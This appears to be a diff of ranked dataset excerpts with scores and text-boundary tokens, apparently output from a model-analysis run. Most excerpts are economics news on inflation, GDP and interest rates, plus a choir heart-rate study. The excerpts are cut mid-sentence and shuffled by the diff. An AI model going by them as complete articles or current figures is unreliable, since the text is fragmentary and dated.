Actually, with the interest rate at a historic low of 0.5%—pedal to the metal for the BoC—it is surprising how slowly the economy is moving. The bank is supposed to be able to juice growth by dropping rates. That’s clearly not happening, here or in other parts of the world. Negative interest rates in Europe have been equally ineffective at improving GDP. @@ -328,7 +349,7 @@ Source; Bank of Canada and author’s calculations But there’s a hidden issue afoot here. Inflation is a sanitized way of talking about wage gains, which are one of its primary components. When the Bank of Canada raises interest rates one of the primary impacts is that it reduces wage gains for working Canadians. As rates rise, businesses cut back, lay some people off and make workers afraid of asking for a raise, hence less inflation. The Bank of Canada inflation range is in effect a ceiling ================================================================================ -Rank = 15; Score = 1564672.0 +Rank = 16; Score = 921600.0 <|begin_of_text|>LONDON (Reuters) - British inflation hit its highest level since September 2013 last month, extending its sharp rise since the vote to leave the European Union and tightening the squeeze on living costs as a national election approaches. Consumer prices rose by an annual 2.7 percent, data showed, and they look set to rise further due to the fall in the value of the pound and the recent rise in global oil prices. @@ -359,7 +380,32 @@ Sterling briefly spiked to its highest in almost a week against the dollar befor Many economists say the impact of the fall in sterling on consumer prices will be felt more strongly in the coming months, and the central bank expects inflation to peak at nearly 3 ================================================================================ -Rank = 16; Score = 1507328.0 +Rank = 17; Score = 892928.0 +<|begin_of_text|>A deflationary Bacon Cheeseburger Index combined with optimistic Google searches for timeshares reflect a U.S. economy in flux — and, likely, a Federal Reserve in flux. + +These readings, plus snapshots of car buying, gun ownership, food-stamp demand and more, make up the “Off the Grid Indicators” report that creator Nicholas Colas, chief market strategist at the New York–based global brokerage Convergex, argues pushes economic sleuthing beyond the obvious payrolls report or consumer price index. + +Read: U.S. adds 215,000 new jobs in March as more workers enter labor force + +Government data often strip out volatile food prices, but market strategist Nicholas Colas and company say doing so miscalculates inflation expectations among shoppers. + +Highlights from the current edition of the now five-year-old quarterly report, especially when combined with traditional government- and industry-issued data and anecdotes, indicate the Fed can be slow with raising interest rates, Colas said. The Fed’s next two meetings come later this month and then in June. + +Read: Fed will likely hike rates in June in wake of jobs report, economists say + +Convergex even trademarked its “Bacon Cheeseburger Index,” an evenly split minibasket of the popular beef-bacon-and-cheese combo that can serve as a relatable inflation gauge. Government data often strip out volatile food prices, but Colas and company say doing so miscalculates inflation expectations among food-conscious shoppers. + +As of the first quarter, thanks to price declines in all three of these cholesterol commodities, a bacon cheeseburger now costs 5.1% less than a year ago, the Convergex report shows. + +A look back at the Bacon Cheeseburger Index to 1990 finds that it is actually a decent indicator of deflation risk. Prior periods when the BCI turned resoundingly negative (3% or more) since 1990 include: 2009 (financial crisis); 1998 (emerging market and Long Term Capital collapse), and 1992 (the lead up to the Iraq invasion). In each case, the Fed was cutting interest rates, not raising them. + +“So should the Fed actually use the Bacon Cheeseburger Index? Of course not. But does it help explain in one compact, if anecdotal, form why the Federal Reserve is happy to hold off on rate increases? I think it does,” said Colas. + +Here are some of the report’s other findings: + +• Since Google GOOGL, +0 +================================================================================ +Rank = 18; Score = 868352.0 <|begin_of_text|>Image caption UK consumers have seen food prices rise 40% since 2007, says the Ernst & Young Item club report High inflation has cost the UK economy £10bn over the last three years, says an influential report. @@ -382,32 +428,28 @@ Mark Gregory, Ernst & Young's chief economist, said: "With consumer spending con When Mark Carney, the new governor of the Bank of England, takes over from Sir Mervyn King in July, he will face the difficult task of keeping inflation under control while also stimulating the faltering UK economy.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> ================================================================================ -Rank = 17; Score = 1499136.0 -<|begin_of_text|>A deflationary Bacon Cheeseburger Index combined with optimistic Google searches for timeshares reflect a U.S. economy in flux — and, likely, a Federal Reserve in flux. - -These readings, plus snapshots of car buying, gun ownership, food-stamp demand and more, make up the “Off the Grid Indicators” report that creator Nicholas Colas, chief market strategist at the New York–based global brokerage Convergex, argues pushes economic sleuthing beyond the obvious payrolls report or consumer price index. - -Read: U.S. adds 215,000 new jobs in March as more workers enter labor force +Rank = 19; Score = 802816.0 +<|begin_of_text|>A heat map of Boston apartments by price per bedroom with MBTA route overlay. -Government data often strip out volatile food prices, but market strategist Nicholas Colas and company say doing so miscalculates inflation expectations among shoppers. +A new tool developed by Jeff Kaufman, a 27-year-old programmer at Google in Cambridge, allows apartment renters to visualize where Boston’s most and least expensive apartments are. Kaufman's heat map displays the cost per bedroom relative to each Boston neighborhood. -Highlights from the current edition of the now five-year-old quarterly report, especially when combined with traditional government- and industry-issued data and anecdotes, indicate the Fed can be slow with raising interest rates, Colas said. The Fed’s next two meetings come later this month and then in June. +The map indicates the most expensive apartments in Boston tend to hover between Back Bay and Downtown Boston and on into the Seaport District. The region’s least expensive apartments are found near Mattapan, Dorchester and Revere. -Read: Fed will likely hike rates in June in wake of jobs report, economists say +Areas of Cambridge along the Red Line also display expensive apartment listings, where the booming tech economy is squeezing commercial rents for startups. -Convergex even trademarked its “Bacon Cheeseburger Index,” an evenly split minibasket of the popular beef-bacon-and-cheese combo that can serve as a relatable inflation gauge. Government data often strip out volatile food prices, but Colas and company say doing so miscalculates inflation expectations among food-conscious shoppers. +Kaufman's first iteration of the heat map originated in 2011 when he was looking for a place to live. -As of the first quarter, thanks to price declines in all three of these cholesterol commodities, a bacon cheeseburger now costs 5.1% less than a year ago, the Convergex report shows. +"I was looking for an apartment and didn't have a good sense of how expensive different parts of the city were," Kaufman says. "I wanted to have a map that gave you a rough idea of the city and how expensive they were." -A look back at the Bacon Cheeseburger Index to 1990 finds that it is actually a decent indicator of deflation risk. Prior periods when the BCI turned resoundingly negative (3% or more) since 1990 include: 2009 (financial crisis); 1998 (emerging market and Long Term Capital collapse), and 1992 (the lead up to the Iraq invasion). In each case, the Fed was cutting interest rates, not raising them. +Reddit user “yiseowl” helped explain the heat map by overlaying the MBTA train map over Kaufman’s. The juxtaposition shows some correlation between rent and MBTA accessibility. -“So should the Fed actually use the Bacon Cheeseburger Index? Of course not. But does it help explain in one compact, if anecdotal, form why the Federal Reserve is happy to hold off on rate increases? I think it does,” said Colas. +According to Kaufman’s data, which he took from apartment rental search engine Padmapper, the average cost per bedroom in 2013 is $1,314. In 2011, the average cost per bedroom was $1,141. -Here are some of the report’s other findings: +This is a much greater increase than inflation. The [Consumer Price Index] in June 2011 was 225.922 while the December 2012 one was 229.594, so you would expect $767/room then to turn into $780/room now instead of the $895 we actually see. -• Since Google GOOGL, +0 +Curbed Boston also published a real-estate map in December of the 15 most expensive home sales of 2012.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> ================================================================================ -Rank = 18; Score = 1425408.0 +Rank = 20; Score = 794624.0 <|begin_of_text|>The latest data on the Chinese economy released on Saturday show exports down 8% year-on-year. By any measure you pick, China’s expansion is losing steam. But working out how much it’s slowing by is extremely hard to do. @@ -436,28 +478,7 @@ The government is lying. This doesn’t seem difficult to imagine. The credibili This doesn’t seem difficult to imagine. The credibility of the Chinese government is attached to both its ability to provide growth and its ability to exert a high level of control over the economy. Slower growth isn’t something it would like to admit. China’s ================================================================================ -Rank = 19; Score = 1392640.0 -<|begin_of_text|>We tend to think of inflation as a singular force that affects everyone the same way. It turns out however that the poorest households may have m'ore to lose as the peso shrinks. In this photo is a 100 trillion Zimbabwe dollar bill, commonplace during its period of hyperinflation. (Photo: Paul/Flickr, CC BY 2.0) - -This content is also available on Medium - -Everyone knows about inflation - a pervasive, unstoppable force that moves prices (and hopefully wages) upward in the economy, but do we really understand it? Further analysis reveals that official overall inflation statistics understate the effect of rising prices on the poor. - -Understanding Inflation - -Inflation is measured through changes in what is called the Consumer Price Index or CPI. This is an aggregate measure of prices based on a certain ‘basket’ of goods composed of those typically consumed by households. It seems like a fair enough way to measure general price increases, but it has the effect of making you think that inflation affects everyone equally - it does not. - -The basket of goods is an approximation of the average proportions that households consume. It turns out, however, that there are significant differences in the basket of goods for households from different income levels: - -Lower income classes tend to spend more of their income on Food & Beverage, and this proportion drops as we move up the income scale. This is because the absolute level of food consumed in the household is limited, and extra income is allocated to certain ‘luxuries’ and other necessities, evidenced by the fact that higher income households spend more of their income on the other, non-food categories. - -Just as a validity check: the data that we generated from the FIES raw data closely approximates the official NSO weighting, except for food and housing. I suspect that imputed rental value was used by the NSO instead of actual rentals paid, but since there was no breakdown in the CPI Technical Notes, I can’t say for sure. Nevertheless, it is the variance in the effect, not the absolute effect, that we are interested in. - -So what does this mean? Different income classes will experience different inflation burdens because the prices of goods and services that they consume rise at different rates: - -Since the base year 2006, essentials such as food and beverage and education have risen much more than the overall inflation rate. This means that poorer households that spend more of their income on food and beverage will feel a stronger pinch from price increases. Non-essential goods’ prices have risen slower than inflation except for Alcohol & Tobacco which were -================================================================================ -Rank = 20; Score = 1384448.0 +Rank = 21; Score = 765952.0 <|begin_of_text|>The government has admitted that 800,000 more households stand to lose out under its flagship welfare scheme than previously thought. In a revised impact assessment of its universal credit scheme, which will replace six of the seven main means-tested benefits and tax credits for those of working age, the Department of Work and Pensions (DWP) says that 2.8 million households will get a lower entitlement to benefits. That compares with a figure of 2 million announced in October 2011 after officials first considered how the changes would affect claimants. @@ -474,46 +495,60 @@ Liam Byrne, the shadow work and pensions secretary, said: "Universal credit is n "The very people this government has let down are being asked to pick up the tab for ministers' failure. 300,000 families on middle and modest incomes will lose £3,600 a year – that's £300 a month. We were promised a welfare revolution but universal credit is descending into universal chaos. Instead of fixing welfare reform, this government is now just ================================================================================ -Rank = 21; Score = 1384448.0 -<|begin_of_text|>Turkish economy up 4 pct in third quarter, surprising analysts - -ANKARA +Rank = 22; Score = 724992.0 +<|begin_of_text|>LONDON (Reuters) - British inflation rose in April for the first time in 10 months, but as the increase was partly due to a late Easter holiday, which pushed up transport costs, it was unlikely to alter interest rate expectations. -DHA Photo +A woman pays a market trader for goods in Soho's Berwick Street Market in central London May 17, 2011. REUTERS/Paul Hackett -Turkey’s economy grew at a surprising 4 percent in the third quarter from the same period in the previous year, the Turkish Statistics Institute (TÜİK) reported on Dec. 10, beating expectations and showing the economy in better shape than many analysts had forecasted.The figure exceeded analyst consensus estimates at 2.7 percent. Adjusted for seasonal and calendar factors, gross domestic product (GDP) grew 5.4 percent in the third quarter from the same period of 2014 and 1.3 percent from the second quarter of 2015, it added.Özgur Altuğ, chief economist at BGC Partners in Istanbul, said the rise came despite political uncertainty surrounding the Nov. 1 election and increased attacks by the outlawed Kurdistan Workers’ Party (PKK).“The data confirmed that the economy continued to accelerate in the third quarter despite political uncertainty and rising terrorism,” he said.Coupled with better-than-expected October industrial output figures, Altuğ said he would revise the 2015 GDP growth forecast from 2.7 percent to 3.4 percent.“The figures confirm the Turkish economy’s resilience to shocks,” he said.“Solid domestic demand continues to fuel growth in Turkey,” Christopher Dembik, an economist with Saxo Bank, told Anadolu Agency.“Consumers had held back spending when the Turkish Lira lost value earlier this year. Now that it has stabilized, confidence in spending has returned,” Dembik added.Household final consumption expenditure increased by 10.6 in the quarter at current prices, the report said.The Consumer Confidence Index increased to 77.15 in November from 62.78 in October.Growth was up from 3.8 percent in the second quarter. The nine-month GDP growth rate increased by 3.4 percent in the third quarter of 2015, the report said.Increasing agriculture activity contributed the most to the GDP increase. The sector increased by 20.1 percent at current prices from the same quarter in 2014, the report said.The value added by industry increased by 7.5 percent in the quarter, the research said. The services sector’s contribution rose 11.2 percent in value.Industrial production rose 4.6 percent in October from October 2014 in Turkey, according to a separate report from TÜİK.“Increases in German manufacturing have meant that Turkish producers can benefit -================================================================================ -Rank = 22; Score = 1351680.0 -<|begin_of_text|>A heat map of Boston apartments by price per bedroom with MBTA route overlay. +Official data also showed that growth in house prices eased in March, potentially tempering concerns about a bubble brewing in the property market although some more up-to-date surveys have shown prices picking up again. -A new tool developed by Jeff Kaufman, a 27-year-old programmer at Google in Cambridge, allows apartment renters to visualize where Boston’s most and least expensive apartments are. Kaufman's heat map displays the cost per bedroom relative to each Boston neighborhood. +The consumer price index rose more than expected to an annual rate of 1.8 percent in April, from 1.6 percent in March, which had been its lowest level in more than four years, the Office for National Statistics ONS said. -The map indicates the most expensive apartments in Boston tend to hover between Back Bay and Downtown Boston and on into the Seaport District. The region’s least expensive apartments are found near Mattapan, Dorchester and Revere. +It was the first rise in the CPI since June 2013 and above a Reuters poll forecast for inflation of 1.7 percent in April. -Areas of Cambridge along the Red Line also display expensive apartment listings, where the booming tech economy is squeezing commercial rents for startups. +Sterling hit a 16-month high against the euro and rose against the dollar before giving up much of its gains as market expectations that the Bank of England will raise interest rates in about a year’s time remained largely intact. -Kaufman's first iteration of the heat map originated in 2011 when he was looking for a place to live. +The opposition Labour party jumped on Tuesday’s figures, saying they showed the government’s complacency about the “cost of living” crisis facing many Britons as wage growth has lagged inflation. -"I was looking for an apartment and didn't have a good sense of how expensive different parts of the city were," Kaufman says. "I wanted to have a map that gave you a rough idea of the city and how expensive they were." +Economists however saw little change in price pressures. -Reddit user “yiseowl” helped explain the heat map by overlaying the MBTA train map over Kaufman’s. The juxtaposition shows some correlation between rent and MBTA accessibility. +“Easter effects aside, the latest release provides little evidence of significant or broad-based price pressures,” said Victoria Clarke, an economist with bank Investec. -According to Kaufman’s data, which he took from apartment rental search engine Padmapper, the average cost per bedroom in 2013 is $1,314. In 2011, the average cost per bedroom was $1,141. +Factory gate inflation in April was weaker than economists’ predictions. -This is a much greater increase than inflation. The [Consumer Price Index] in June 2011 was 225.922 while the December 2012 one was 229.594, so you would expect $767/room then to turn into $780/room now instead of the $895 we actually see. +Higher airfares linked to Easter and other transport costs helped push up consumer prices, the ONS said. Easter fell in April this year but in late March last year. -Curbed Boston also published a real-estate map in December of the 15 most expensive home sales of 2012.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> -================================================================================ -Rank = 23; Score = 1294336.0 -<|begin_of_text|>Choir singing is known to promote wellbeing. One reason for this may be that singing demands a slower than normal respiration, which may in turn affect heart activity. Coupling of heart rate variability (HRV) to respiration is called Respiratory sinus arrhythmia (RSA). This coupling has a subjective as well as a biologically soothing effect, and it is beneficial for cardiovascular function. RSA is seen to be more marked during slow-paced breathing and at lower respiration rates (0.1 Hz and below). In this study, we investigate how singing, which is a form of guided breathing, affects HRV and RSA. The study comprises a group of healthy 18 year olds of mixed gender. The subjects are asked to; (1) hum a single tone and breathe whenever they need to; (2) sing a hymn with free, unguided breathing; and (3) sing a slow mantra and breathe solely between phrases. Heart rate (HR) is measured continuously during the study. The study design makes it possible to compare above three levels of song structure. In a separate case study, we examine five individuals performing singing tasks (1–3). We collect data with more advanced equipment, simultaneously recording HR, respiration, skin conductance and finger temperature. We show how song structure, respiration and HR are connected. Unison singing of regular song structures makes the hearts of the singers accelerate and decelerate simultaneously. Implications concerning the effect on wellbeing and health are discussed as well as the question how this inner entrainment may affect perception and behavior. +Offsetting those rises, food price growth was the lowest in eight years as a mild spring kept vegetable prices down. -Introduction +Core CPI, which excludes food costs and other items but does include transport costs, rose 2.0 percent, its strongest rate since September last year. -This paper aims to illuminate and discuss how singing (Grape et al., 2003) and especially choir singing (Marti, 2012) promotes wellbeing. We focus on the interplay between two oscillators: the respiratory organ and the heart, while singing. The heart does not keep a constant rhythm. On the contrary, heart rate (HR) is accelerating and decelerating constantly. This fluctuation in HR is called heart rate variability (HRV). In this article, we mainly speak of the dynamic aspects of HRV, i.e., how HR develops over time forming cycles of HR fluctuations, but we also measure HRV by RMSSD (Root Mean Square of the Successive Differences) (Degiorgio et al., 2010). +House prices - which are an increasing source of concern for the Bank of England - were up 8.0 percent on the year in March, slowing from a 9.2 percent rise in February, the ONS also said. + +Prices in London, however, were up 17 percent on the year, although that was less than a 17.8 percent increase in February, the biggest increase since 200 +================================================================================ +Rank = 23; Score = 716800.0 +<|begin_of_text|>Oct 26 (Reuters) - Commerce Department’s Bureau of Economic Analysis’ seasonally adjusted Gross Domestic Product data on a chain-weighted basis. + +Following are annualized percent changes from prior quarters, in 2005 chain dollars: + +Q3-A Q2-F Q1 2011 GDP 2.0 1.3 2.0 1.8 Final Sales of Dom. Product 2.1 1.7 2.4 2.0 Final Sales to Dom. Buyers 2.3 1.4 2.2 1.8 PCE price index 1.8 0.7 2.5 2.4 Core PCE price index 1.3 1.7 2.2 1.4 Mkt-based PCE price index 1.8 0.6 2.5 2.5 Core Mkt-based index 1.3 1.8 2.2 1.4 GDP price index 2.8 1.6 2.0 2.1 Implicit Deflator 2.9 1.5 2.2 2.1 Consumer Spending 2.0 1.5 2.4 2.5 + +Durable Goods 8.5 -0.2 11.5 7.2 + +NonDurable Goods 2.4 0.6 1.6 2.3 + +Services 0.8 2.1 1.3 1.9 Business Investment -1.3 3.6 7.5 8.6 Structures -4.4 0.6 12.9 2.7 Equipment/software 0.0 4.8 5.4 11.0 Housing Investment 14.4 8.5 20.5 -1.4 Exports -1.6 5.3 4.4 6.7 Imports -0.2 2.8 3.1 4.8 Government Purchases 3.7 -0.7 -3.0 -3.1 Federal 9.6 -0.2 -4.2 -2.8 State and Local -0.1 -1.0 -2.2 -3.4 A-Advance (1st estimate). P-Preliminary (2nd). F-final (3rd.) Seasonally adjusted annual rates, in blns of +================================================================================ +Rank = 24; Score = 684032.0 +<|begin_of_text|>Choir singing is known to promote wellbeing. One reason for this may be that singing demands a slower than normal respiration, which may in turn affect heart activity. Coupling of heart rate variability (HRV) to respiration is called Respiratory sinus arrhythmia (RSA). This coupling has a subjective as well as a biologically soothing effect, and it is beneficial for cardiovascular function. RSA is seen to be more marked during slow-paced breathing and at lower respiration rates (0.1 Hz and below). In this study, we investigate how singing, which is a form of guided breathing, affects HRV and RSA. The study comprises a group of healthy 18 year olds of mixed gender. The subjects are asked to; (1) hum a single tone and breathe whenever they need to; (2) sing a hymn with free, unguided breathing; and (3) sing a slow mantra and breathe solely between phrases. Heart rate (HR) is measured continuously during the study. The study design makes it possible to compare above three levels of song structure. In a separate case study, we examine five individuals performing singing tasks (1–3). We collect data with more advanced equipment, simultaneously recording HR, respiration, skin conductance and finger temperature. We show how song structure, respiration and HR are connected. Unison singing of regular song structures makes the hearts of the singers accelerate and decelerate simultaneously. Implications concerning the effect on wellbeing and health are discussed as well as the question how this inner entrainment may affect perception and behavior. + +Introduction + +This paper aims to illuminate and discuss how singing (Grape et al., 2003) and especially choir singing (Marti, 2012) promotes wellbeing. We focus on the interplay between two oscillators: the respiratory organ and the heart, while singing. The heart does not keep a constant rhythm. On the contrary, heart rate (HR) is accelerating and decelerating constantly. This fluctuation in HR is called heart rate variability (HRV). In this article, we mainly speak of the dynamic aspects of HRV, i.e., how HR develops over time forming cycles of HR fluctuations, but we also measure HRV by RMSSD (Root Mean Square of the Successive Differences) (Degiorgio et al., 2010). It is known that HRV and respiration rate affect each other. This interdependency, first discussed by (Ludwig, 1847), is referred to as respiratory sinus ================================================================================ -Rank = 24; Score = 1261568.0 +Rank = 25; Score = 679936.0 <|begin_of_text|>NYT Pick Keynes Florida 1 day ago In macroeconomic terms, an increase in taxes followed by an equivalent increase in spending (and that therefore does not increase the deficit) increases the GDP. It is called “the balanced budget multiplier” (you can Google it!), BBM. Conversely, a reduction in taxes followed by a reduction in spending reduces the GDP, and therefore increases unemployment. @@ -538,7 +573,35 @@ Flag 768 Recommend Recommend Share this comment on Facebook Share this comment ================================================================================ -Rank = 25; Score = 1220608.0 +Rank = 26; Score = 679936.0 +<|begin_of_text|>Turkish economy up 4 pct in third quarter, surprising analysts + +ANKARA + +DHA Photo + +Turkey’s economy grew at a surprising 4 percent in the third quarter from the same period in the previous year, the Turkish Statistics Institute (TÜİK) reported on Dec. 10, beating expectations and showing the economy in better shape than many analysts had forecasted.The figure exceeded analyst consensus estimates at 2.7 percent. Adjusted for seasonal and calendar factors, gross domestic product (GDP) grew 5.4 percent in the third quarter from the same period of 2014 and 1.3 percent from the second quarter of 2015, it added.Özgur Altuğ, chief economist at BGC Partners in Istanbul, said the rise came despite political uncertainty surrounding the Nov. 1 election and increased attacks by the outlawed Kurdistan Workers’ Party (PKK).“The data confirmed that the economy continued to accelerate in the third quarter despite political uncertainty and rising terrorism,” he said.Coupled with better-than-expected October industrial output figures, Altuğ said he would revise the 2015 GDP growth forecast from 2.7 percent to 3.4 percent.“The figures confirm the Turkish economy’s resilience to shocks,” he said.“Solid domestic demand continues to fuel growth in Turkey,” Christopher Dembik, an economist with Saxo Bank, told Anadolu Agency.“Consumers had held back spending when the Turkish Lira lost value earlier this year. Now that it has stabilized, confidence in spending has returned,” Dembik added.Household final consumption expenditure increased by 10.6 in the quarter at current prices, the report said.The Consumer Confidence Index increased to 77.15 in November from 62.78 in October.Growth was up from 3.8 percent in the second quarter. The nine-month GDP growth rate increased by 3.4 percent in the third quarter of 2015, the report said.Increasing agriculture activity contributed the most to the GDP increase. The sector increased by 20.1 percent at current prices from the same quarter in 2014, the report said.The value added by industry increased by 7.5 percent in the quarter, the research said. The services sector’s contribution rose 11.2 percent in value.Industrial production rose 4.6 percent in October from October 2014 in Turkey, according to a separate report from TÜİK.“Increases in German manufacturing have meant that Turkish producers can benefit +================================================================================ +Rank = 27; Score = 634880.0 +<|begin_of_text|>The U.S Federal Reserve has released the worst-case scenarios it wants banks to stress test against, and some of them are downright apocalyptic. + +As part of the stress tests, which the Fed announced it wants banks to do annually, U.S. lenders will have to simulate the effects of a severe recession hitting the U.S. What does that involve, you ask? + +In the Fed’s bleakest scenario, the United States would slip into recession in the fourth quarter of 2011 (the one we’re currently in) and post four consecutive quarters of negative growth. The unemployment rate would peak at 13.05%, while the Dow Jones Industrial Average would plunge all the way to 5,668 points (from the current level of 11,305). That would be even lower than the Dow’s financial crisis low in March 2009, when it settled at 6,547. + +The Fed’s simulated recession would be deepest in the first quarter of 2012, when real GDP would contract by a whopping 7.98%. Peak unemployment wouldn’t hit until a year later. + +Overall, the tests, known as the Comprehensive Capital Analysis and Review, lay out 14 economic metrics for banks to include as means of testing their preparedness. The metrics include Consumer Price Inflation levels, Treasury Yields and mortgage rates. + +The tests are designed for the top 31 banks in the U.S. that hold assets of US$50-billion or more. They will generate models that will produce loss estimates and see whether capital ratios are high enough to survive the worst-case scenarios. + +The Fed will also allow banks to come up with their own scenarios to stress test their finances. Either way, it will requires banks to submit their capital plans by January 9, 2012. + +For a full list of the metrics that will be used in the tests, check out the U.S. Federal Reserve’s website. + +• Email: jshmuel@nationalpost.com | Twitter: jshmuel<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 28; Score = 606208.0 <|begin_of_text|>Key consumer debt measure hits record Net worth boosted by stocks, housing @@ -583,51 +646,111 @@ Story continues below advertisement Thus, economists believe the debt burden will ================================================================================ -Rank = 26; Score = 1171456.0 -<|begin_of_text|>Oct 26 